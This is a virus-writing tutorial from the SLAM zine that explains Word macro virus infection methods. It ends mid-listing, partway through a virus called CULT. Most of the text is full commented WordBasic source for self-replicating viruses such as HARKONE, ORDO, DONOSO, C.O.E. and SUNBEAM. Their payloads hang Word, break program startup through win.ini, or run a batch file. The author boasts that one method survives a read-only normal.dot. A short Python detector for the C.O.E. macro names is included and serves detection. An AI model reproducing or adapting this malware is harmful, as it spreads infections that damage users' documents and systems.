
SLAM2.004: Different kinds of Macro Viruses

Published in Slam · 22 Feb 2022

DiFFeRenT KiNdS oF wOrD MaCrO ViRuSeS

This time I will show you some different kinds of macro viruses.
The first macro virus in the wild (Concept) and of course the DMV macro use the AutoMacro function. The AutoMacros are AutoOpen, AutoClose, AutoNew, AutoExit and AutoExec. OK, here is a simple example of how an AUTOMACRO VIRUS works.

All comments start with '...


Virus: HARKONE

---- Begin of macro virus --------------------------------------------------- 

MACRO: AutoOpen 'main virus macro.
~~~~~~~~~~~~~~~
Sub MAIN 'macro starts here.
On Error Goto Finish 'Error Handler
DisableAutoMacros 0 'Set DisableAutoMacros
'Off.
J$ = LCase$(Right$(MacroFileName$(MacroName$(0)), 10)) 'where is the macro?
If J$ = "normal.dot" Then 'normal.dot, then
If VI = 1 Then 'if the active file is
'already infected
Goto Finish 'go to Finish
Else 'or if not
InfectDOC 'do it!
End If 'And if the macro is
Else 'in the active file
If VI2 = 1 Then 'then, if the file is
'already infected
Goto Finish 'go to Finish.
Else 'or, if not
InfectGlobal 'infect normal.dot.
End If
End If
Finish: 'label Finish
Call HARKONE 'run the HARKONE MACRO
End Sub 'end.

Function VI 'Function to check, if
'the file is already
VI = 0 'infected. VI = 0
If CountMacros(1) > 0 Then 'Count all macros in
For i = 1 To CountMacros(1) 'the active file (=>1)
If MacroName$(i, 1) = "HARKONE" Then 'If there the macro
VI = 1 'HARKONE then VI = 1
End If 'if not
Next i 'search now again
End If
End Function 'end.

Function VI2 'Function to check, if
'normal.dot is already
VI2 = 0 'infected. VI2 = 0
If CountMacros(0) > 0 Then 'Count all macros in
For i = 1 To CountMacros(0) 'normal.dot (=>0)
If MacroName$(i, 0) = "HARKONE" Then 'If there the macro
VI2 = 1 'HARKONE then VI2 = 1
End If 'if not
Next i 'search now again
End If
End Function 'end.

Sub InfectDOC 'This is the code to
'infect the active
FileSaveAs .Format = 1 'file. At first save
'the active file as a
'template and
MacroCopy "Global:AutoClose", FileName$() + ":AutoOpen" 'copy the AutoClose
'macro to the active
'file with the new
'name AutoOpen. And
MacroCopy "Global:HARKONE", FileName$() + ":HARKONE" 'now the same with the
'HARKONE macro.
FileSaveAll 1, 1 'At last save all.
End Sub 'end.

Sub InfectGlobal 'Code to infect
'normal.dot.
MacroCopy FileName$() + ":AutoOpen", "Global:AutoClose" 'Copy the AutoOpen
'macro to normal.dot
'with the new name
'AutoClose. And again
MacroCopy FileName$() + ":HARKONE", "Global:HARKONE" 'the same with the
'HARKONE macro.
FileSaveAll 1, 0 'Save all now.
End Sub 'end.

MACRO: HARKONE 'payload macro.
~~~~~~~~~~~~~~
Sub MAIN 'code starts here.
If Day(Now()) = 1 And Month(Now()) = 6 Then 'if today is 01/06/xx
FileNew 'then create a new
ToggleFull 'document and maximize
DocMaximize 'the screen + document
Font "Imprint MT Shadow" 'Use Font "I.."
FontSize 60 'Size 60
Bold 'Bold
Insert "HARKONE" 'Insert now the word
'HARKONE.
StartOfLine 'Go to top of document
CharRight 1, 1 'mark the first letter
FormatFont .Points = "48", .Color = 6 'and make it red.
EndOfLine 'Go to end of document
InsertPara '....
InsertPara
FontSize 48
Insert "NJ [SLAM]"
HangOn: 'label HangOn
Goto HangOn 'goto HangOn
End If
End Sub 'end.

'I know it's a quite lame payload, but easy to understand.

---- End of macro virus -----------------------------------------------------


Most viruses in the wild use the AutoMacro option.
The viruses copy their macros to the global macro file NORMAL.DOT and then infect every other document that is opened.

Another kind of macro virus is the DIRECT ACTION virus.
Here is again a simple example:


Virus: ORDO

---- Begin of macro virus --------------------------------------------------- 

macro: AutoOpen 'main virus macro.
~~~~~~~~~~~~~~~
Sub MAIN 'macro starts here.
ScreenUpdating 'ScreenUpdating Off
DisableAutoMacros 'Disable AutoMacros.
InfectedFile$ = FileName$() 'InfectedFile$ =
'the active file.
For ORDO = 1 To CountFiles() 'Count the filenames
'in the FileList.
If Files$(FileName$(ORDO)) <> "" Then 'If there a filename
FileList ORDO 'open the file.
NewFile$ = FileName$() 'NewFile$ = the new
'opened file.
If InfectedFile$ <> NewFile$ Then 'If NewFile$ is not
'InfectedFile$ then
If VI = 0 Then 'if this file isn't
'infected,
FileSaveAs .Format = 1 'save it as a template
'and copy the aUtOoPeN
'and ORDO macro from
'InfectedFile$ to
'NewFile$
MacroCopy InfectedFile$ + ":aUtOoPeN", NewFile$ + ":"
MacroCopy InfectedFile$ + ":ORDO", NewFile$ + ":"
End If
FileClose 1 'close + save the file
End If
End If
Next 'search now a new file
a$ = AppInfo$(2) : a$ = Left$(a$, 1) : a = Val(a$) 'Is this WinWord 7.0?
If a = 7 Then 'if yes then
If Day(Now()) = 2 And Month(Now()) = 7 Then 'if today 02/07/xx
ORDO 'run the macro: ORDO
End If
End If
DisableAutoMacros 0 'Set DisableAutoMacros off again.
End Sub

Function VI 'Function to check, if
'the file is already
VI = 0 'infected. VI = 0
If CountMacros(1) > 0 Then 'Count all macros in
For i = 1 To CountMacros(1) 'the active file.
If MacroName$(i, 1) = "ORDO" Then 'If there the ORDO
VI = 1 'macro then VI = 1
End If
Next i 'If not search again.
End If
End Function

macro: ORDO 'payload macro
~~~~~~~~~~~
Declare Function GetWindowsDirectoryA Lib "Kernel32"(lpBuffer As String,
nSize As Long) As Long 'Function to get
'the windows path.
Sub MAIN
Windir$ = String$(255, " ") : nSize = 255 'Windir$ = win path
WordLong = GetWindowsDirectoryA(WinDir$, nSize) 'Get size of Windir$
IniName$ = windir$ + "\" + "CONTROL.INI" 'IniName$ = path to
'control.ini
a$ = "O.R.D.O NJ [SLAM]" 'a$ = "O...."
b$ = Windir$ + "\SYSTEM\MARQUEE.SCR" 'b$ = path to the
'screensaver.
c$ = Windir$ + "\SYSTEM.INI" 'c$ = path to system.ini

'Set now the time, when the Screensaver should be active.
'(60 seconds)

SetPrivateProfileString "HKEY_CURRENT_USER\Control Panel\desktop",
"ScreenSaveTimeOut", "60", ""

SetPrivateProfileString "HKEY_CURRENT_USER\Control Panel\desktop",
"ScreenSaveActive", "60", ""

'Now insert the new text into control.ini

SetPrivateProfileString "Screen Saver.Marquee", "Text", a$, IniName$

'and use the ScreenSaver "Marquee".

SetPrivateProfileString "boot", "SCRNSAVE.EXE", b$, c$
End Sub 'end.

'Now after the next start of Windows will show the Screensaver
'Marquee every minute the message: O.R.D.O by Nightmare Joker (SLAM).

---- End of macro virus ----------------------------------------------------


At the moment there are only three or four viruses which use this method. I think it's better than the method before, but of course a little bit more difficult. The big advantage is that the user can mark normal.dot as read-only and still has no chance to stop the virus. :)

Now another method. You can use ShortCuts to start the virus macro.
So if the user presses e.g. the "e" key, the virus becomes active and tries to infect the active file or normal.dot.

And again a simple example.


Virus: DONOSO (created with the Demolition Kit)

---- Begin of macro virus -------------------------------------------------- 

macro: DONOSO1
~~~~~~~~~~~~~~
Sub MAIN 'macro starts here.
On Error Goto Finish 'Error Handler

'Link the macro "DONOSO1" with the space bar (KeyCode 32).

ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = "DONOSO1", .Add, .Context = 0
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = "DONOSO1", .Add, .Context = 1

'And now link the macro "DONOSO2" with the key "i".

ToolsCustomizeKeyboard .KeyCode = 73, .Category = 2, .Name = "DONOSO2", .Add, .Context = 0
ToolsCustomizeKeyboard .KeyCode = 73, .Category = 2, .Name = "DONOSO2", .Add, .Context = 1

VM1$ = WindowName$() + ":DONOSO1" 'VM1$ = ...
VM2$ = WindowName$() + ":DONOSO2" 'I think you see it.
';-))
If VInstalled = 1 Then 'OK, if the active
'file is infected
Goto Finish 'then go to Finish
Else 'or if not
On Error Resume Next 'Set Error Handler.
FileSaveAs .Format = 1 'Save a active file
'as a template and
MacroCopy "Global:DONOSO1", VM1$ 'copy macro DONOSO1
MacroCopy "Global:DONOSO2", VM2$ 'and DONOSO2 to the
'active file.
FileSaveAll 1, 0 'Save now all.
End If

Finish: 'Label Finish.
A$ = FileName$() 'a$ = active file.
If A$ = "" Then 'If there not a active
Goto Finito 'file, go to Finito
Else 'or
Insert " " 'insert a space.
End If

Finito: 'Label Finito
If Month(Now()) = 8 And Day(Now()) = 3 Then 'If today 03/08/xx,
Payload 'start the payload,
Else 'or if not
Goto EndOne 'go to EndOne.
End If

EndOne: 'Label EndOne
End Sub 'end.

Function VInstalled 'Function to check
'if the active file
'is already infected.
VInstalled = 0 'VInstalled = 0
If CountMacros(1) > 0 Then 'Count all macros in
For i = 1 To CountMacros(1) 'the active file (=>1)
If MacroName$(i, 1) = "DONOSO1" Then
'If there the DONOSO1
VInstalled = 1 'macro then VI.. = 1
End If
Next i 'if not, search again
End If
End Function 'end.

Sub Payload

REM A Virus from Nightmare Joker's Demolition Kit! 'quite good kit! ;-))

On Error Resume Next 'Set Error Handler

ToolsCustomizeKeyboard .KeyCode = 27, .Category = 1, .Name = "Abbrechen", .Remove, .Context = 0

SendKeys "^" + "%" + "-" 'start the
'"winword murder"! :))
End Sub 'end.

macro : DONOSO2
~~~~~~~~~~~~~~~
Sub MAIN 'macro starts here.
On Error Goto Finish 'Error Handler

'Link the macro "DONOSO1" with the space bar (KeyCode 32).

ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = "DONOSO1", .Add, .Context = 0
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = "DONOSO1", .Add, .Context = 1

'And now link the macro "DONOSO2" with the key "i".

ToolsCustomizeKeyboard .KeyCode = 73, .Category = 2, .Name = "DONOSO2", .Add, .Context = 0
ToolsCustomizeKeyboard .KeyCode = 73, .Category = 2, .Name = "DONOSO2", .Add, .Context = 1

VM1$ = WindowName$() + ":DONOSO1" 'and ....
VM2$ = WindowName$() + ":DONOSO2" '........

NJ$ = MacroFileName$("DONOSO1") 'NJ$= name of the file,
'which is infected.
F$ = FileNameInfo$(NJ$, 5) 'This is the same, but
'without the path.
If VInstalled = 1 Then 'If normal.dot is
Goto Finish 'infected,go to Finish
Else 'or
On Error Resume Next 'Set Error Handler.
MacroCopy VM1$, "Global:DONOSO1" 'Copy the macros
MacroCopy VM2$, "Global:DONOSO2" 'to normal.dot and
FileSaveAll 1, 1 'save all.
End If

Finish: 'Label Finish
A$ = FileName$() 'a$ = active file.
If A$ = "" Then 'If there no file
Goto Finito 'go to Finito
Else 'or
Insert "i" 'insert a "i"
End If

Finito: 'Label Finito.
If Month(Now()) = 8 And Day(Now()) = 3 Then 'If today 03/08/xx
Payload 'start the payload
Else 'or if not
Goto EndOne 'go to EndOne
End If

EndOne: 'Label EndOne
End Sub 'end.

Function VInstalled 'Function to check, if
'normal.dot is already
VInstalled = 0 'infected. VIn... = 0
If CountMacros(0) > 0 Then 'Count all macros in
For i = 1 To CountMacros(0) 'normal.dot (=>0)
If MacroName$(i, 0) = "DONOSO1" Then
VInstalled = 1 'If there the DONOSO1
'macro then VIn.. = 1
End If
Next i 'if not, search again
End If
End Function 'end.

---- End of macro virus ----------------------------------------------------


The chance to spread this virus isn't very big, because the user will normally only read a new text file and the virus can only become active if the user hits one of the "infected" keys. But I think a combination of the AutoMacro and this ShortCut method could be not bad.

An advantage of the ShortCut method is the possibility to change the macro name at every infection (to make semi-polymorphic macro viruses).

OK, here is an example of a semi-polymorphic macro virus.

Virus: C.O.E. (again created with the Demolition Kit)

---- Begin of macro virus -------------------------------------------------- 

macro: BIAWFPJU 'Macro name will
~~~~~~~~~~~~~~~ 'change at every
'infection.
Sub MAIN 'Macro starts here.
On Error Goto Done 'Error Handler.

A$ = FileName$() 'a$ = active file
If A$ = "" Then Goto Finish 'If there no active
'file, go to Finish.
If VInstalled = 0 Then 'If the active file
'isn't infected,
Run1 'start "Run1",
Run2 '"Run2",
RunPayload 'and "RunPayload"
FileSaveAll 1, 1 'at last save all.
Else 'Or if the active file
Goto Done 'is already infected
End If 'go to Done.

Done: 'Label Done.
A$ = FileName$() 'a$ = active file
If A$ = "" Then 'If there no active
Goto Finish 'file go to Finish.
Else 'or
Insert "e" 'insert a "e"
End If

Finish: 'Label Finish
MsgBox "COE", - 8 'show message "COE"
End Sub 'end.

Sub Run1 'Function to generate
'a new name and to
'copy the first macro.
X$ = Fun$(F$, G$, H$, J$) 'Get four letters (X$).
Y$ = Fun$(F$, G$, H$, J$) 'and again (Y$).

Z$ = X$ + Y$ 'Z$ = new name

R1$ = GetDocumentVar$("VirNameDoc") 'Get the old macro
CO$ = FileName$() + ":" + R1$ 'name and copy it
MacroCopy CO$, "Global:" + Z$ 'to normal.dot. Save
SetProfileString "Intl", "Info2", Z$ 'macro name (win.ini).
'Link the macro with
'the space bar (KeyCode 32).
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, .Name = Z$, .Add, .Context = 0
End Sub 'end.

Sub Run2
X$ = Fun$(F$, G$, H$, J$) 'Get four letters (X$)
Y$ = Fun$(F$, G$, H$, J$) 'and again (Y$).

Z$ = X$ + Y$ 'Z$ = new name

R2$ = GetDocumentVar$("VirName") 'Get the old macro
OC$ = FileName$() + ":" + R2$ 'name and copy it
MacroCopy OC$, "Global:" + Z$ 'to normal.dot. Save
SetProfileString "Intl", "Info1", Z$ 'macro name (win.ini).
'Link the macro with
'the key "e".
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = Z$, .Add, .Context = 0
End Sub 'end.

Sub RunPayload
X$ = Fun$(F$, G$, H$, J$) 'Get now four letters
Y$ = Fun$(F$, G$, H$, J$) 'and the same again.

Z$ = X$ + Y$ 'Z$ = new name

R3$ = GetDocumentVar$("VirNamePayload") 'Get again the old
'macro name and
OCO$ = FileName$() + ":" + R3$ 'copy it to
MacroCopy OCO$, "Global:" + Z$ 'normal.dot.
SetProfileString "Intl", "Info3", Z$ 'Save the macro name.
'(win.ini)
End Sub 'end

Function VInstalled 'Function to check if
'the active file is
'already infected.
CC$ = GetProfileString$("Intl", "Info1") 'Get the macro name
VInstalled = 0 'Vinstalled = 0
If CountMacros(0) > 0 Then 'Count all macros in
For i = 1 To CountMacros(0) 'normal.dot (=>0).
If MacroName$(i, 0) = CC$ Then 'If there the virus
VInstalled = 1 'macro then VI.. = 1
End If
Next i 'search again
End If
End Function 'end.

Function Fun$(F$, G$, H$, J$) 'Function to generate
'a new macro name.
One = 1169 'One = 1169
Two = 9294 'Two = 9294
Num = Int(Rnd() * (Two - One) + One) 'Get now a new numba.
A$ = Str$(Num) 'Translate it into a
A$ = LTrim$(A$) 'string and remove the
'space.
B$ = Mid$(A$, 1, 1) 'b$ = the first, c$ =
C$ = Mid$(A$, 2, 1) 'the second and ...
D$ = Mid$(A$, 3, 1) 'character.
E$ = Mid$(A$, 4, 1)

If B$ = "1" Then F$ = "A" 'If b$ = 1 then F$
If B$ = "2" Then F$ = "B" '= A
If B$ = "3" Then F$ = "C" 'and so on...
If B$ = "4" Then F$ = "D"
If B$ = "5" Then F$ = "E"
If B$ = "6" Then F$ = "F"
If B$ = "7" Then F$ = "G"
If B$ = "8" Then F$ = "H"
If B$ = "9" Then F$ = "I"
If B$ = "0" Then F$ = "J"

If C$ = "1" Then G$ = "H"
If C$ = "2" Then G$ = "I"
If C$ = "3" Then G$ = "J"
If C$ = "4" Then G$ = "K"
If C$ = "5" Then G$ = "L"
If C$ = "6" Then G$ = "M"
If C$ = "7" Then G$ = "N"
If C$ = "8" Then G$ = "O"
If C$ = "9" Then G$ = "P"
If C$ = "0" Then G$ = "Q"

If D$ = "1" Then H$ = "A"
If D$ = "2" Then H$ = "B"
If D$ = "3" Then H$ = "C"
If D$ = "4" Then H$ = "D"
If D$ = "5" Then H$ = "E"
If D$ = "6" Then H$ = "F"
If D$ = "7" Then H$ = "G"
If D$ = "8" Then H$ = "H"
If D$ = "9" Then H$ = "I"
If D$ = "0" Then H$ = "J"

If E$ = "1" Then J$ = "R"
If E$ = "2" Then J$ = "S"
If E$ = "3" Then J$ = "T"
If E$ = "4" Then J$ = "U"
If E$ = "5" Then J$ = "V"
If E$ = "6" Then J$ = "W"
If E$ = "7" Then J$ = "X"
If E$ = "8" Then J$ = "Y"
If E$ = "9" Then J$ = "Z"
If E$ = "0" Then J$ = "Q"

Fun$ = F$ + G$ + H$ + J$ 'Fun$ = the new name
End Function 'end.

macro: BIDQHKJS
~~~~~~~~~~~~~~~
Sub MAIN
On Error Goto Finish 'Error Handler

A$ = FileName$() 'a$ = active file
If A$ = "" Then Goto Finish 'If there no active
'file then go to Finish
CO$ = GetProfileString$("Intl", "Info1") 'Get macro name
OC$ = GetProfileString$("Intl", "Info2") 'one, two
OCO$ = GetProfileString$("Intl", "Info3") 'and three.

If VInstalled = 1 Then 'If the active file
'is already infected
Goto Finish 'goto Finish,
Else 'or if not:
On Error Resume Next 'Set Error Handler,
FileSaveAs .Format = 1 'save the active file
'as a template,
Run1 'call Run1,
Run2 'Run2 and
RunPayload 'RunPayload.
FileSaveAll 1, 0 'At last save all.
End If

Finish: 'Label Finish.
A$ = FileName$() 'a$ = active file.
If A$ = "" Then 'If there no active
Goto Finito 'file then go to Finito
Else 'or
Insert " " 'insert a space.
End If

Finito: 'Label Finito.
If Month(Now()) = 9 And Day(Now()) = 4 Then 'If today 04/09/xx
Goto Payload 'go to "Payload"
Else 'or if not
Goto No 'go to "No".
End If

Payload: 'Label Payload.
AK$ = GetProfileString$("Intl", "Info3") 'Get the macro name
ToolsMacro .Name = AK$, .Run, .Show = 0, .Description = "", .NewName = ""
'and start the macro.
No: 'Label "No"
End Sub 'end.

Sub Run1
X$ = Fun$(F$, G$, H$, J$) 'Get four characters
Y$ = Fun$(F$, G$, H$, J$) 'and again.

Z$ = X$ + Y$ 'Z$ = new name

CO$ = GetProfileString$("Intl", "Info2") 'Get the first macro
MacroCopy "Global:" + CO$, FileName$() + ":" + Z$ 'name and copy the
'macro to the active
SetDocumentVar "VirName", Z$ 'file. Save the
ToolsCustomizeKeyboard .KeyCode = 32, .Category = 2, 'macro name and link
.Name = Z$, .Add, .Context = 1 'the macro with the
End Sub 'space bar. end.

Sub Run2
X$ = Fun$(F$, G$, H$, J$) 'and so on....
Y$ = Fun$(F$, G$, H$, J$)

Z$ = X$ + Y$

OC$ = GetProfileString$("Intl", "Info1")
MacroCopy "Global:" + OC$, FileName$() + ":" + Z$
SetDocumentVar "VirNameDoc", Z$
ToolsCustomizeKeyboard .KeyCode = 69, .Category = 2, .Name = Z$, .Add, .Context = 1
End Sub

Sub RunPayload
X$ = Fun$(F$, G$, H$, J$)
Y$ = Fun$(F$, G$, H$, J$)

Z$ = X$ + Y$

OCO$ = GetProfileString$("Intl", "Info3")
MacroCopy "Global:" + OCO$, FileName$() + ":" + Z$
SetDocumentVar "VirNamePayload", Z$
End Sub

Function VInstalled
On Error Resume Next
CC$ = GetDocumentVar$("VirNameDoc")
VInstalled = 0
If CountMacros(1) > 0 Then
For i = 1 To CountMacros(1)
If MacroName$(i, 1) = CC$ Then
VInstalled = 1
End If
Next i
End If
End Function

Function Fun$(F$, G$, H$, J$)
One = 1169
Two = 9294
Num = Int(Rnd() * (Two - One) + One)
A$ = Str$(Num)
A$ = LTrim$(A$)

B$ = Mid$(A$, 1, 1)
C$ = Mid$(A$, 2, 1)
D$ = Mid$(A$, 3, 1)
E$ = Mid$(A$, 4, 1)

If B$ = "1" Then F$ = "A"
If B$ = "2" Then F$ = "B"
If B$ = "3" Then F$ = "C"
If B$ = "4" Then F$ = "D"
If B$ = "5" Then F$ = "E"
If B$ = "6" Then F$ = "F"
If B$ = "7" Then F$ = "G"
If B$ = "8" Then F$ = "H"
If B$ = "9" Then F$ = "I"
If B$ = "0" Then F$ = "J"

If C$ = "1" Then G$ = "H"
If C$ = "2" Then G$ = "I"
If C$ = "3" Then G$ = "J"
If C$ = "4" Then G$ = "K"
If C$ = "5" Then G$ = "L"
If C$ = "6" Then G$ = "M"
If C$ = "7" Then G$ = "N"
If C$ = "8" Then G$ = "O"
If C$ = "9" Then G$ = "P"
If C$ = "0" Then G$ = "Q"

If D$ = "1" Then H$ = "A"
If D$ = "2" Then H$ = "B"
If D$ = "3" Then H$ = "C"
If D$ = "4" Then H$ = "D"
If D$ = "5" Then H$ = "E"
If D$ = "6" Then H$ = "F"
If D$ = "7" Then H$ = "G"
If D$ = "8" Then H$ = "H"
If D$ = "9" Then H$ = "I"
If D$ = "0" Then H$ = "J"

If E$ = "1" Then J$ = "R"
If E$ = "2" Then J$ = "S"
If E$ = "3" Then J$ = "T"
If E$ = "4" Then J$ = "U"
If E$ = "5" Then J$ = "V"
If E$ = "6" Then J$ = "W"
If E$ = "7" Then J$ = "X"
If E$ = "8" Then J$ = "Y"
If E$ = "9" Then J$ = "Z"
If E$ = "0" Then J$ = "Q"

Fun$ = F$ + G$ + H$ + J$ '....
End Function 'end.

macro: AIHYFNFR 'payload macro
~~~~~~~~~~~~~~~
Sub MAIN
SetProfileString "windows", "Program", "" 'remove something from
End Sub 'win.ini ;)

'Really nasty payload. After the next start of Windows won't work any program.

---- End of macro virus -----------------------------------------------------


This virus now changes its macro names at every new infection.
So it's a semi-polymorphic macro virus.
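
Why the renaming is only semi-polymorphic, shown as an added example (not code from the original article): Fun$ pushes each digit of a number between One and Two through a fixed table, so every name it can produce is recognisable, and the current names are also kept in plain text under [Intl] Info1..Info3 in win.ini and in the document variables VirName, VirNameDoc and VirNamePayload. The function names and the sample win.ini text are constructed for illustration.

```python
# Digit-to-letter tables copied from Fun$ in the C.O.E. listing, one per digit
# position; the index into each string is the digit (0..9).
POSITION_TABLES = ("JABCDEFGHI", "QHIJKLMNOP", "JABCDEFGHI", "QRSTUVWXYZ")
ONE, TWO = 1169, 9294          # the constants One and Two in Fun$

INI_KEYS = {"info1", "info2", "info3"}                   # win.ini, section [Intl]
DOC_VARS = ("VirName", "VirNameDoc", "VirNamePayload")   # document variables


def decode_half(half):
    """Map four letters back to the number Fun$ started from, or None."""
    digits = []
    for table, letter in zip(POSITION_TABLES, half):
        digit = table.find(letter)
        if digit < 0:
            return None
        digits.append(str(digit))
    return int("".join(digits))


def is_generated_name(name):
    """True if the name is two Fun$ outputs glued together (Z$ = X$ + Y$)."""
    name = name.upper()            # Word compares macro names case-insensitively
    if len(name) != 8:
        return False
    for half in (name[:4], name[4:]):
        number = decode_half(half)
        # Int(Rnd() * (Two - One) + One) stays below Two when Rnd() < 1;
        # Two itself is accepted as well so the check errs on the wide side.
        if number is None or not ONE <= number <= TWO:
            return False
    return True


def ini_markers(text):
    """Return {key: value} for [Intl] Info1..Info3 entries holding a generated name."""
    hits, section = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].casefold()
        elif section == "intl" and "=" in line:
            key, _, value = line.partition("=")
            key, value = key.strip(), value.strip()
            if key.casefold() in INI_KEYS and is_generated_name(value):
                hits[key] = value
    return hits


def document_var_markers(doc_vars):
    """Same check for the document variables the listing reads and writes."""
    return {k: doc_vars[k] for k in DOC_VARS if is_generated_name(doc_vars.get(k, ""))}


# Constructed win.ini fragment; the three values are the macro names printed
# in the listing above.
SAMPLE_WIN_INI = """\
[Intl]
sCountry=United States
Info1=BIDQHKJS
Info2=BIAWFPJU
Info3=AIHYFNFR
[Desktop]
Info1=BIDQHKJS
"""

if __name__ == "__main__":
    for macro in ("BIAWFPJU", "BIDQHKJS", "AIHYFNFR", "AUTOOPEN", "SUNBEAM"):
        print(macro, is_generated_name(macro))
    print(ini_markers(SAMPLE_WIN_INI))
```

The three macro names shown in the listing all decode to numbers inside the generator's range, while ordinary names such as AutoOpen do not.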

The first virus which used menu macros was Nuclear.
So if the user picks a menu command, e.g. "FileExit", the virus becomes active, infects the document and closes it.

And now an easy example of this infection method:


Virus: SUNBEAM

---- Begin of macro virus -------------------------------------------------- 

MACRO: DocClose
~~~~~~~~~~~~~~~
Sub MAIN 'macro starts here.
If CountMacros(0) > 0 Then 'Count all macros in
For i = 1 To CountMacros(0) 'normal.dot. (=>0)
If MacroName$(i, 0) = "SUNBEAM" Then 'If there the macro
Installed = 1 'SUNBEAM then I.. = 1
End If
Next i 'If not, search again
End If
If Installed = 0 Then 'If normal.dot isn't
'infected, then copy
MacroCopy WindowName$() + ":SUNBEAM","Global:SUNBEAM" 'the macros SUNBEAM,
MacroCopy WindowName$() + ":FileOpen","Global:FileOpen" 'FileOpen and DocClose
MacroCopy WindowName$() + ":DocClose","Global:DocClose" 'to normal.dot.
FileSaveAll 1, 0 'At last save all.
End If
Finish: 'Label Finish.
SUNBEAM 'Run macro SUNBEAM.
DocClose 'Close the active file
End Sub 'end.

macro: FileOpen
~~~~~~~~~~~~~~~
Sub MAIN '-\
Dim dlg As FileOpen ' \
GetCurValues dlg 'FileOpen commands
Dialog dlg ' /
FileOpen dlg '-/
On Error Goto Finish 'Error Handler
If CountMacros(1) > 0 Then 'Count all macros in
For i = 1 To CountMacros(1) 'the active file (=>1)
If MacroName$(i, 1) = "SUNBEAM" Then 'If there the macro
Installed = 1 'SUNBEAM then I.. = 1
End If
Next i 'search again
End If
If Installed = 0 Then 'If the active file
'isn't infected then
FileSaveAs .Format = 1 'save the active file
'as a template and
MacroCopy "Global:SUNBEAM",WindowName$() + ":SUNBEAM" 'copy the macros
MacroCopy "Global:FileOpen",WindowName$() + ":FileOpen" 'SUNBEAM, FileOpen and
MacroCopy "Global:DocClose",WindowName$() + ":DocClose" 'DocClose to the
'active file. At last
FileSaveAll 1, 1 'save all.
End If
Finish: 'Label Finish.
SUNBEAM 'Run macro SUNBEAM.
End Sub 'end.

macro: SUNBEAM
~~~~~~~~~~~~~~
Sub MAIN 'macro starts here.
If Day(Now()) = 5 And Month(Now()) = 10 Then 'If today 05/10/xx
a$ = MacroFileName$("SUNBEAM") 'get the name of
b$ = Left$(a$, 3) 'HD. e.g. c:\ or d:\
Open b$ + "die.bat" For Output As #1 'Open the file die.bat
Print #1, "echo 123>clock$" 'Write it into the
Close #1 'file and close it.
Shell b$ + "die.bat", 0 'Run now die.bat.
End If
REM Thanks McNasty.
REM SUNBEAM by Nightmare Joker (SLAM)
End Sub 'end.

---- End of macro virus -----------------------------------------------------


This virus will now infect every document which is opened or closed.
OK, the menu macro method is not bad, but it has one big drawback:
e.g. the SUNBEAM virus works only with the English version of Word.

But of course there are some possibilities to create a macro virus with menu macros which will work with every Word version. =8=))

And again a simple example:


Virus: ChAkA

---- Begin of macro virus --------------------------------------------------- 

MACRO: AutoOpen
~~~~~~~~~~~~~~~
Sub MAIN 'macro starts here

REM ChAkA! Nightmare Joker [SLAM]

On Error Goto Finish 'Error Handler.
a$ = AppInfo$(16) 'Which version is it?
a$ = Left$(a$, 7) 'Use only the first
'7 characters of a$.
If a$ = "Deutsch" Then 'Is it the german
'version, then
M1$ = "Dateiôffnen" 'M1$ = Dateiôffnen
M2$ = "DokumentSchliessen" 'and M2$ = Doku... .
ElseIf a$ = "English" Then 'Or is it the english
M1$ = "FileOpen" 'version then M1$ =
M2$ = "DocClose" 'FileOpen and M2$ =
End If 'DocClose.
If CountMacros(0) > 0 Then 'Count now all macros
For i = 1 To CountMacros(0) 'in normal.dot. (=>0).
If MacroName$(i, 0) = "ChAkA" Then 'If there the macro
IV = 1 'ChAkA then IV = 1
End If
Next i 'search again
End If
If IV = 0 Then 'If normal.dot isn't
'infected, then
MacroCopy FileName$() + ":aUTOoPEN", "Global:ChAkA" 'copy it to normal.dot
ScreenUpdating 'Set ScreenUpdating off
ToolsMacro .Name = M1$, .Show = 1, .Edit 'Open now e.g. the
'FileOpen macro.
StartOfDocument '-
LineDown 1 '|
CharRight 10 '|
Insert Chr$(32) '| insert now the
StartOfDocument '| line:
LineDown 4 '| ChAkA.InfectDoc
EndOfLine '|
InsertPara '|
Insert "ChAkA.InfectDoc" '-
DocClose 1 'Save and close it.
ToolsMacro .Name = M2$, .Show = 1, .Edit 'Open now e.g. the
'DocClose macro.
StartOfDocument '- insert now again
EndOfLine '| the line:
InsertPara '| ChAkA.InfectDoc
Insert "ChAkA.InfectDoc" '-
DocClose 1 'save and close it.
FileSaveAll 1, 0 'Save all!
ScreenUpdating 'Set ScreenUpdating On
End If
Finish: 'Label Finish
End Sub 'end.

Sub InfectDoc
On Error Goto Venito 'Set Errorhandler.
If CountMacros(1) > 0 Then 'Count all macros in
For i = 1 To CountMacros(1) 'the active file.
If MacroName$(i, 1) = "aUTOoPEN" Then 'If there the macro
ID = 1 'aUTOoPEN then ID = 1
End If
Next i 'search again
End If
If ID = 0 Then 'If the active file
'isn't infected,
FileSaveAs .Format = 1 'save the active file
'as a template and
MacroCopy "Global:ChAkA", FileName$() + ":aUTOoPEN" 'copy the macro.
FileSaveAll 1, 1 'At last save all.
End If
End Sub 'end.

---- End of macro virus -----------------------------------------------------


So this virus now works with the English and the German version of Word.
But this method is a little bit cumbersome.
OK, if you want to infect e.g. only the German, Swedish or ? version of Word, then you can use this method.

Normally it would be better if we could get the names directly from the menus.
And of course, that's no problem either. :-))

Look at the following virus:


Virus: CULT

---- Begin of macro virus --------------------------------------------------- 

MACRO: AutoClose
~~~~~~~~~~~~~~~~
Function Name1$(h$) 'Function to get
'the first menu name.
a$ = MenuText$(0, 1, 0) 'a$ = e.g. in the
'english version of
'word now "&File"
x = Len(a$) + 1 : i = 1 : l = 1 'x = the length of a$.
Again: 'Label Again.
If i = x Then Goto GOON '-
d$ = Mid$(a$, i, 1) '|
If d$ = Chr$(38) Or d$ = Chr$(46) Or d$ = Chr$(32) Then '| now remove
i = i + 1 '| some character's
Goto Again '| that we don't need.
Else '| e.g. "." or "&"
e$ = e$ + d$ '|
i = i + 1 '|
Goto Again '|
End If '-
GOON: 'Label GOON
z = Len(e$) + 1 'z = length of e$ + 1
AA$ = MenuItemText$(e$, 0, 1, 0) 'AA$ = The first
'option in the "File"
